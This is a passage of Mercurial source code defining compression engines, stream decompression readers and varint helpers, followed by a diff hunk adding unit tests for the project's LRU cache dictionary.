            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

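# A minimal sketch (not part of the original module) of implementing and
# registering a custom engine against the interface above. The 'example'
# and 'EX' identifiers are hypothetical; a real engine must also avoid
# colliding with already-registered bundle names and types.
#
#   class _exampleengine(compressionengine):
#       def name(self):
#           return 'example'
#
#       def bundletype(self):
#           """Hypothetical pass-through engine, for illustration only."""
#           return 'example', 'EX'
#
#       # bundletype() is declared, so compressstream() and
#       # decompressorreader() must be implemented as well.
#       def compressstream(self, it, opts=None):
#           return it
#
#       def decompressorreader(self, fh):
#           return fh
#
#   compengines.register(_exampleengine())
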
class _CompressedStreamReader(object):
    def __init__(self, fh):
        if safehasattr(fh, 'unbufferedread'):
            self._reader = fh.unbufferedread
        else:
            self._reader = fh.read
        self._pending = []
        self._pos = 0
        self._eof = False

    def _decompress(self, chunk):
        raise NotImplementedError()

    def read(self, l):
        buf = []
        while True:
            while self._pending:
                if len(self._pending[0]) > l + self._pos:
                    newbuf = self._pending[0]
                    buf.append(newbuf[self._pos:self._pos + l])
                    self._pos += l
                    return ''.join(buf)

                newbuf = self._pending.pop(0)
                if self._pos:
                    buf.append(newbuf[self._pos:])
                    l -= len(newbuf) - self._pos
                else:
                    buf.append(newbuf)
                    l -= len(newbuf)
                self._pos = 0

            if self._eof:
                return ''.join(buf)
            chunk = self._reader(65536)
            self._decompress(chunk)
            if not chunk and not self._pending and not self._eof:
                # No progress and no new data, bail out
                return ''.join(buf)

class _GzipCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        d = self._decompobj.copy()
        try:
            d.decompress('x')
            d.flush()
            if d.unused_data == 'x':
                self._eof = True
        except zlib.error:
            pass

class _BZ2CompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except EOFError:
            self._eof = True

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
        newbuf = self._decompobj.decompress('BZ')
        if newbuf:
            self._pending.append(newbuf)

class _ZstdCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except self._zstd.ZstdError:
            self._eof = True

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _GzipCompressedStreamReader(fh)

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _ZstdCompressedStreamReader(fh, self._module)

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f:      filename to rename
    tag:    a string tag that will be included in the new name
    ctx:    a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

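# Illustrative sketch only, not part of the module: with a set standing in
# for the context and another set of reserved names (both literals below are
# hypothetical), safename() walks oldname~tag, oldname~tag~1, ... until it
# finds a candidate that is free in both.
#
#   >>> safename('foo', 'resolve', {'foo~resolve'}, {'foo~resolve~1'})
#   'foo~resolve~2'
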
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the binary representation of the value, least
    significant group first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

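# Worked example (illustrative comment, not part of the module): 1337 is
# 0b10100111001. The low 7 bits (0111001 = 0x39) are emitted first with the
# continuation bit set (0x39 | 0x80 = 0xb9); the remaining bits
# (1337 >> 7 == 10 == 0x0a) form the final byte, which is why the doctest
# above shows uvarintencode(1337) == '\xb9\n'.
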
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
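
# A minimal round-trip sketch (illustrative only): encoding then decoding
# should return the original value for any unsigned integer.
#
#   >>> from io import BytesIO
#   >>> vals = (0, 1, 127, 128, 1337, 65536, 2 ** 40)
#   >>> all(uvarintdecodestream(BytesIO(uvarintencode(v))) == v for v in vals)
#   True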
@@ -1,122 +1,176 @@
from __future__ import absolute_import, print_function

import unittest

import silenttestrunner

from mercurial import (
    util,
)

class testlrucachedict(unittest.TestCase):
    def testsimple(self):
        d = util.lrucachedict(4)
        self.assertEqual(d.capacity, 4)
        d['a'] = 'va'
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'

        self.assertEqual(d['a'], 'va')
        self.assertEqual(d['b'], 'vb')
        self.assertEqual(d['c'], 'vc')
        self.assertEqual(d['d'], 'vd')

        # 'a' should be dropped because it was least recently used.
        d['e'] = 've'
        self.assertNotIn('a', d)

        self.assertIsNone(d.get('a'))

        self.assertEqual(d['b'], 'vb')
        self.assertEqual(d['c'], 'vc')
        self.assertEqual(d['d'], 'vd')
        self.assertEqual(d['e'], 've')

        # Touch entries in some order (both get and set).
        d['e']
        d['c'] = 'vc2'
        d['d']
        d['b'] = 'vb2'

        # 'e' should be dropped now
        d['f'] = 'vf'
        self.assertNotIn('e', d)
        self.assertEqual(d['b'], 'vb2')
        self.assertEqual(d['c'], 'vc2')
        self.assertEqual(d['d'], 'vd')
        self.assertEqual(d['f'], 'vf')

        d.clear()
        for key in ('a', 'b', 'c', 'd', 'e', 'f'):
            self.assertNotIn(key, d)

    def testunfull(self):
        d = util.lrucachedict(4)
        d['a'] = 1
        d['b'] = 2
        d['a']
        d['b']

        for key in ('a', 'b'):
            self.assertIn(key, d)

    def testcopypartial(self):
        d = util.lrucachedict(4)
        d['a'] = 'va'
        d['b'] = 'vb'

        dc = d.copy()

        self.assertEqual(len(dc), 2)
        for key in ('a', 'b'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        self.assertEqual(len(d), 2)
        for key in ('a', 'b'):
            self.assertIn(key, d)
            self.assertEqual(d[key], 'v%s' % key)

        d['c'] = 'vc'
        del d['b']
        dc = d.copy()
        self.assertEqual(len(dc), 2)
        for key in ('a', 'c'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

    def testcopyempty(self):
        d = util.lrucachedict(4)
        dc = d.copy()
        self.assertEqual(len(dc), 0)

    def testcopyfull(self):
        d = util.lrucachedict(4)
        d['a'] = 'va'
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'

        dc = d.copy()

        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        # 'a' should be dropped because it was least recently used.
        dc['e'] = 've'
        self.assertNotIn('a', dc)
        for key in ('b', 'c', 'd', 'e'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        # Contents and order of original dict should remain unchanged.
        dc['b'] = 'vb_new'

        self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
        for key in ('a', 'b', 'c', 'd'):
            self.assertEqual(d[key], 'v%s' % key)

    def testcopydecreasecapacity(self):
        d = util.lrucachedict(5)
        d['a'] = 'va'
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'

        dc = d.copy(2)
        for key in ('a', 'b'):
            self.assertNotIn(key, dc)
        for key in ('c', 'd'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        dc['e'] = 've'
        self.assertNotIn('c', dc)
        for key in ('d', 'e'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        # Original should remain unchanged.
        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, d)
            self.assertEqual(d[key], 'v%s' % key)

    def testcopyincreasecapacity(self):
        d = util.lrucachedict(5)
        d['a'] = 'va'
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'

        dc = d.copy(6)
        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        dc['e'] = 've'
        dc['f'] = 'vf'
        for key in ('a', 'b', 'c', 'd', 'e', 'f'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        dc['g'] = 'vg'
        self.assertNotIn('a', dc)
        for key in ('b', 'c', 'd', 'e', 'f', 'g'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        # Original should remain unchanged.
        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, d)
            self.assertEqual(d[key], 'v%s' % key)

if __name__ == '__main__':
    silenttestrunner.main(__name__)
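
# Summary sketch of the behavior exercised above (assuming the lrucachedict
# API from mercurial.util; illustrative, not part of the change): copy() may
# be given a new capacity, and a shrinking copy keeps only the most recently
# used entries.
#
#   d = util.lrucachedict(4)
#   for k in ('a', 'b', 'c', 'd'):
#       d[k] = 'v' + k
#   dc = d.copy(2)        # keeps only 'c' and 'd', the two newest entries
#   assert 'a' not in dc and 'b' not in dc
#   assert dc['c'] == 'vc' and dc['d'] == 'vd'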